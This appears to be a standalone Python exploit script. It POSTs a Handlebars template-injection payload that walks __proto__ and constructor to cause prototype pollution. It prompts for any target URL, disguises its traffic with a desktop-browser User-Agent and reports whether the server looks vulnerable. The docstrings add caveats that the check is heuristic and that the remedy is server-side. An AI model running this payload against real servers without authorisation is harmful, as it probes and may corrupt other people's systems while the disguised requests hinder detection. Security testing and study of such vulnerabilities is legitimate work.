import requests
import json
import logging
# Configure the root logger at import time: INFO and above, printed as "LEVEL: message".
logging.basicConfig(
    format='%(levelname)s: %(message)s',
    level=logging.INFO,
)
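def _strip_proxy_credentials(proxy_url):
    """Return *proxy_url* without any ``user:password@`` part, for safe logging."""
    scheme, sep, rest = str(proxy_url).rpartition("://")
    return f"{scheme}{sep}{rest.rpartition('@')[2]}"


def exploit(url, proxy=None, timeout=10):
    """Send one templated request to *url* and log whether the reply carries the marker.

    The request is a JSON POST whose ``template`` field holds a Handlebars-style
    expression that walks ``__proto__`` / ``constructor`` and names a property
    called ``polluted``. The reply is then searched for the string ``polluted``.
    Nothing is returned; the outcome is only written to the log.

    The match is a heuristic, not proof: the word ``polluted`` is part of the
    submitted template, so an endpoint that echoes its input (for example in an
    error body) matches too. Treat a hit as a finding to confirm on the server
    side. Where it is confirmed, the remedy is server-side as well: do not
    compile request-supplied templates, and keep the template engine patched.

    Args:
        url: Endpoint that receives the POST.
        proxy: Optional proxy URL, used for both http and https traffic.
        timeout: Seconds passed to ``requests.post`` as its timeout.
    """
    # Template submitted to the endpoint; 'polluted' is the marker looked for below.
    payload = {
        "template": "{{#with __proto__}}{{#with constructor}}{{defineProperty 'polluted' this}}{{/with}}{{/with}}"
    }
    headers = {
        'Content-Type': 'application/json',
        # Fixed desktop-browser User-Agent. Defenders reviewing logs should not
        # rely on the UA to tell this traffic from ordinary browser requests.
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'
    }
    proxies = {'http': proxy, 'https': proxy} if proxy else None

    try:
        logging.info(f"Sending exploit to {url}...")
        if proxies:
            # A proxy URL may embed user:password; keep those out of the log.
            redacted = {
                scheme: _strip_proxy_credentials(target)
                for scheme, target in proxies.items()
            }
            logging.info(f"Using proxy: {redacted}")
        response = requests.post(url, data=json.dumps(payload), headers=headers, proxies=proxies, timeout=timeout)

        if response.status_code != 200:
            logging.error(f"Exploit failed with status code: {response.status_code}")
            return

        # A 200 only shows that the request was answered; the marker check
        # below is what decides the verdict.
        logging.info("Exploit executed successfully.")

        # Prefer the parsed JSON body and fall back to the raw text. The decode
        # error class differs between requests versions and JSON backends, but
        # every variant derives from ValueError, so catch that rather than
        # json.JSONDecodeError alone.
        try:
            reply_text = str(response.json())
        except ValueError:
            reply_text = response.text

        if 'polluted' in reply_text:
            logging.warning("The server is vulnerable to prototype pollution!")
        else:
            logging.info("Server responded, but exploit did not seem to work.")
    except requests.RequestException as e:
        logging.error(f"Error: {e}")
        if proxies:
            logging.error("Check if proxy is running and accessible.")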
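if __name__ == "__main__":
    # Interactive entry point: prompt for the endpoint, an optional proxy and a
    # timeout, then run a single check against that endpoint.
    target_url = input("Enter the target URL: ").strip()
    proxy_url = input("Enter proxy URL (leave blank if none): ").strip()
    proxy = proxy_url or None
    timeout_input = input("Enter timeout in seconds (default 10): ").strip()
    # Let int() decide what is a number: str.isdigit() accepts characters such
    # as superscript digits that int() rejects, which crashed the script.
    try:
        timeout = int(timeout_input)
    except ValueError:
        timeout = 10
    # A zero or negative timeout is rejected by the HTTP stack with a
    # ValueError that exploit() does not catch, so fall back to the default.
    if timeout <= 0:
        timeout = 10
    exploit(target_url, proxy, timeout)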